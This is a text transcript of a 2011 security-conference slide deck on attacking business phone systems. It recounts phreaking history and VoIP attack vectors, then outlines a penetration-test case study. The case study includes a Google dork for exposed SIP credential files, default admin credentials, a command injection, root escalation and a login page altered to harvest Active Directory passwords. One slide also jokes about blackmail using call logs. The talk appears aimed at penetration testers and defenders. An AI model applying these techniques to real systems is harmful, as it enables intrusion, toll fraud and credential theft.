owning phone systems - thotcon · 2011. 6. 24. · why it (still) matters sunday, may 15, 2011....
TRANSCRIPT
Owning Phone SystemsWhy it (still) matters
Sunday, May 15, 2011
Josh “savant42” BrasharsAppSec Consulting
Sunday, May 15, 2011
Obligatory “WTF are you?” slide
Pen Tester
Sometimes “telephone enthusiast”
Co-Founder of Mayhemic Labs
dc949
Sunday, May 15, 2011
But before we begin...
Sunday, May 15, 2011
My Wife = APT
Sunday, May 15, 2011
My Wife = APTSeriously.
Sunday, May 15, 2011
Some quick math (Frank^2 loves math)
Sunday, May 15, 2011
let “d” = Defconlet “m” = Months
Sunday, May 15, 2011
x = (d * 19) - (m * 9)
Sunday, May 15, 2011
Sunday, May 15, 2011
And then...
Sunday, May 15, 2011
Sunday, May 15, 2011
No Defcon.
Sunday, May 15, 2011
Sunday, May 15, 2011
Owning Phones
Sunday, May 15, 2011
Why this talk?
Phones have been around a long time
Tech may change but basic premise is the same
Everywhere
Sunday, May 15, 2011
Pen Testers
Always about the new hotness
Don’t care about the old and busted.
Sunday, May 15, 2011
Sunday, May 15, 2011
As a result...
Security stopped being important
PBXs became more complex, more obscure
Sunday, May 15, 2011
“Nobody is attacking phones anymore”
Sunday, May 15, 2011
“Phreaking is dead”
Sunday, May 15, 2011
Any creature without a predator...
Sunday, May 15, 2011
Remember when web “sites” became “applications?”
An orgy of shitty coding
“We’ll secure it later!”
(Or... never.)
Sunday, May 15, 2011
Needlessly Complex
Sunday, May 15, 2011
So now we have all these horny bunnies...
Sunday, May 15, 2011
Hundreds of vendors
Acquisitions, Mergers, Leasing, Rebranding
Sunday, May 15, 2011
In summary...
Telephones, one of the most important assets a business can posses, are more broken than they have ever been.
Sunday, May 15, 2011
Without the phones, most businesses will
hurt.
Sunday, May 15, 2011
Phones are “trusted”
Sunday, May 15, 2011
Phones make money.
Sunday, May 15, 2011
Money for Pen tests.
Sunday, May 15, 2011
...and money to go to Thotcon.
Sunday, May 15, 2011
In short, hack harder.
Sunday, May 15, 2011
Pen Test Engagements
Did you make sure to ask? (scope)
How hard do you look at them?
How well do you know telephony?
Sunday, May 15, 2011
The good news?
Sunday, May 15, 2011
The good news?(for pen testers)
Sunday, May 15, 2011
Easier than ever.
Sunday, May 15, 2011
But first...
Sunday, May 15, 2011
Old School
Sunday, May 15, 2011
Sweet!
Scaling!
Redundant!
Secure!
Sunday, May 15, 2011
...uh, how to do routing?
Sunday, May 15, 2011
Let’s use sound!In-Band Signaling
Sunday, May 15, 2011
In-Band Signaling
Secret tones within the existing channel
Security Through Obscurity
What could go wrong?!
Sunday, May 15, 2011
Sunday, May 15, 2011
Blind telephone enthusiasts figured it out
Could drop call by whistling
Bell technical journal published frequencies
Phone phreaking is born.
Sunday, May 15, 2011
Making it Happin’
Sunday, May 15, 2011
Blind phreaks used cassettes and pianos to create Multi-Frequency (MF) tones
Met John “Capt. Crunch” Draper
Discovered Cap’n Crunch Bosun Whistle could create 2600 hz tone, seize trunk
Crunch created electronic device to phreak
Sunday, May 15, 2011
Sunday, May 15, 2011
Toll fraud is huge
Production of “Blue Boxes” ignites, Metasploit for phones
Even Woz and Jobs get in on it.
Sunday, May 15, 2011
Genie is out of the bottle
Kids are controlling the phone network
Mafia and Political Dissidents get in on it
“Hacker” culture is in full swing
Sunday, May 15, 2011
Phones are Owned.
Sunday, May 15, 2011
And then...
Sunday, May 15, 2011
The King is Dead(ish)
Party continued full swing until switches went digital
Control channels are (mostly) no longer in-band
Sunday, May 15, 2011
We’re cool now, right?
Sunday, May 15, 2011
Wrong.
Sunday, May 15, 2011
Digital Era
Phone switches are basically giant computers.
Computers with modems.
Sunday, May 15, 2011
Sunday, May 15, 2011
Damn kids.
As technology improves, so do attackers
Skill requirement goes up, somewhat
Mafia and Activists are less involved, but hacking remains rampant
Sunday, May 15, 2011
Damn kids.
Personal computers boom, BBSes are born
“K-Rad boards” lead to more fraud
Long Distance is $$$++
Victimless crime?
Sunday, May 15, 2011
Highly Skilled AttackersToll fraud leads the way to owning digital switches
LOD, Masters of Deception (MoD), etc...
Pranking!
Why does my house phone ask me for coins?!?
Eavesdropping
Sunday, May 15, 2011
Highly Skilled Attackers
Calls are maliciously re-routed
Denial of Service
Dogs and cats, living together.
Continued
Sunday, May 15, 2011
Mass Hysteria.
Sunday, May 15, 2011
Sunday, May 15, 2011
NO CARRIER
Sunday, May 15, 2011
Sunday, May 15, 2011
R.I.P.
Increased interest in hacking computers
Phone phreaking dies down
Long distance calls become reasonable
IP is the new hotness
BBSes are mostly gone
Sunday, May 15, 2011
We’re cool NOW, right?
Sunday, May 15, 2011
...
Sunday, May 15, 2011
Sunday, May 15, 2011
The Honeymoon
Phone calls are now dirt cheap.
As little as .02 CENTS per minute.
Business is STOKED.
Who really cares about toll fraud?
Sunday, May 15, 2011
Sunday, May 15, 2011
Old becomes new.
Sunday, May 15, 2011
Retro is in.
Old attacks, new techniques
Interception is now trivial.
Caller ID Spoofing
Voice Mail Attacks
Swatting
Paris Hilton
Sunday, May 15, 2011
Fast forward to...
Sunday, May 15, 2011
Sunday, May 15, 2011
Today.
The honeymoon is over.
VoIP is everywhere
VoIP has been talked about to death
Everyone uses VoIP.
Sunday, May 15, 2011
Let’s get down to it.
Sunday, May 15, 2011
Threat Modeling
Sunday, May 15, 2011
Attack Vectors
Trust and Social Engineering Attacks
Information Disclosure
Interception
OS Attacks
Toll Fraud
Denial of Service
Sunday, May 15, 2011
Trust
Caller ID Spoofing
This is Jim From IT Services, I hear your computer is running slowly?
This is CEO Jim, gimme your passwords!
Sunday, May 15, 2011
Trust
Sunday, May 15, 2011
Sunday, May 15, 2011
VoIP Hopper
http://voiphopper.sourceforge.net/
Hop...er... VoIP.
Sunday, May 15, 2011
Information Disclosure
Convergence is here to stay.
“WebEx” style conferencing
Proprietary data uploaded as slide decks
“Confidential”, “Partner Only”
Saved to the file system
Sunday, May 15, 2011
Information Disclosure
Call Logs tell you who calls who
The CEO sure does call his secretary a lot.
Like, a LOT, a lot.
Dude, I think the CEO is @#%ing the secretary.
BLACKMAIL!
Sunday, May 15, 2011
Interception
Sunday, May 15, 2011
The old way
Sunday, May 15, 2011
The New Way.
Sunday, May 15, 2011
Interception
Protocol attacks to eavesdrop on calls
SIP credentials are trivial to steal and re-use.
MITM
• PBX -> Attacker PBX -> Tubes
• Trivial to record, deny, etc.
Sunday, May 15, 2011
Wireless.
Sunday, May 15, 2011
OS Attacks
Who patches the phone system? Sys admins? The telephony guys?
Not *MY* Problem, right?
Sunday, May 15, 2011
Sunday, May 15, 2011
Default passwords.
Sunday, May 15, 2011
“changeme”
Sunday, May 15, 2011
Toll Fraud
Easier than ever before
Like Perl, there’s more than one way to do it wrong.
Dial Plan Logic Errors = Outbound trunks
Default Telnet or VxWorks credentials
Sunday, May 15, 2011
Toll Fraud
Voicemail Collect Charges Attack
Stealing Credentials
Google for sip.conf & iax.conf
Sunday, May 15, 2011
Denial of Service
Childs play.
Sunday, May 15, 2011
Sunday, May 15, 2011
Web Interfaces(Hi Raf!)
Sunday, May 15, 2011
A whole new way to fail.
Sunday, May 15, 2011
Web Interfaces
Ease of Use = Ease of Compromise
Inherit the OWASP Top 10+++
Sunday, May 15, 2011
Just one example.
Sunday, May 15, 2011
intitle:”index.of” (sip.conf | iax.conf) “last.modified”
Sunday, May 15, 2011
Sunday, May 15, 2011
Remember when we had to scan for codes?
Sunday, May 15, 2011
Sunday, May 15, 2011
TFTP?!?
Sunday, May 15, 2011
Sunday, May 15, 2011
Sunday, May 15, 2011
Remember when we had to wardial for this?
Sunday, May 15, 2011
Derail: War Dialing
iWAR by da Beave
WarVOX by HDM
ToneLoc (yes, people still use it)
Sunday, May 15, 2011
Slow or ExpensiveYou pick.
Sunday, May 15, 2011
Pro Tip:
• CNAM lookups!
• Backspoof
• HTTP API
Sunday, May 15, 2011
Sunday, May 15, 2011
Google for Asterisk + “CallerID” or “Asterisk CNAM”
$0.002 a query
(roughly one share of LGTT)
Sunday, May 15, 2011
Oh, right...
Where was I?
Sunday, May 15, 2011
Case Study:Owning the whole network via the phone
Sunday, May 15, 2011
(not talking about SE here)
Sunday, May 15, 2011
Sunday, May 15, 2011
ShoreTel Conference
• “Convergence” - IM, Conference, WebEx
• Super secret software (Linux, shhh!)
• No root for you!
Sunday, May 15, 2011
Sunday, May 15, 2011
admin / changeme
Sunday, May 15, 2011
Sunday, May 15, 2011
Sunday, May 15, 2011
Sunday, May 15, 2011
Sunday, May 15, 2011
via Burp Suite
Sunday, May 15, 2011
syscmds.cgi
Sunday, May 15, 2011
Oops.
Sunday, May 15, 2011
%26 is != “|”This is why phone people shouldn’t write webapps.
Sunday, May 15, 2011
Sunday, May 15, 2011
Savant, who cares? ‘nobody’ is a nobody.
Sunday, May 15, 2011
Sunday, May 15, 2011
Sunday, May 15, 2011
Nightly automated backups.
Sunday, May 15, 2011
...and it is run by root.
Sunday, May 15, 2011
Sunday, May 15, 2011
Sunday, May 15, 2011
Sunday, May 15, 2011
Sunday, May 15, 2011
Sunday, May 15, 2011
john
Sunday, May 15, 2011
“Ok, so that’s one box, impress me.”
Sunday, May 15, 2011
Remember this? Yeah, that’s active directory enabled.
Sunday, May 15, 2011
Simple to patch.
• Tweak login page to capture credentials to file.
• Same host, no problems with SSL cert
• Schedule a conference with CEO, IT, Ops.
Sunday, May 15, 2011
I accidentally the whole org chart.
Sunday, May 15, 2011
MSF Module(s)
• ShoreTel Brute by Keith Leigh
• http://code.google.com/p/shoretel-brute/
• MSF Root payload module coming soon.
Sunday, May 15, 2011
Questions?@savant42 on the twitters
Sunday, May 15, 2011